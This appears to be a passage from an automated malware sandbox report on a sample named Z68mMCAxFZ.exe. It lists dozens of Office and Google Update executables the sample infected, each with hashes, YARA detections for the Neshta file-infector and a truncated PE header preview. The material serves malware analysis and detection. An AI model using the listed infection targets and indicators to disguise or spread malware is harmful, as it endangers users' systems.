                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.461871956296466
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                          MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                          SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                          SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                          SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.119504084682648
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                          MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                          SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                          SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                          SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):4.799951544005101
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                          MD5:7078371E0D358B86D46D6CF87987C8CD
                                                          SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                          SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                          SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.05148718063145
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                          MD5:D4B144B9963B3114F1D938F44200AE62
                                                          SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                          SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                          SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.365915780903398
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                          MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                          SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                          SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                          SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.420838658743323
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                          MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                          SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                          SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                          SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.364257425575085
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                          MD5:9180D3CEE013A6DE40DD963A16951734
                                                          SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                          SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                          SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.435519044418047
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                          MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                          SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                          SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                          SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.278417014765199
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                          MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                          SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                          SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                          SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.254081989191424
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                          MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                          SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                          SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                          SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.565853286242963
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                          MD5:2BE98153912196C9044AB31250DEAF28
                                                          SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                          SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                          SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.517183428602308
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                          MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                          SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                          SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                          SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.31341198420156
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                          MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                          SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                          SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                          SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.571220400525005
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                          MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                          SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                          SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                          SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.35638621946935
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                          MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                          SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                          SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                          SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.572547877647106
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                          MD5:FDB7DA820D2F539A317A598BA31067C8
                                                          SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                          SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                          SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.571346004771877
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                          MD5:5BC82420D22E028C2481B8150AD4F793
                                                          SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                          SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                          SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.5964179831347325
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                          MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                          SHA1:E79038C6363781BF92D4487BD77A4A770352E948
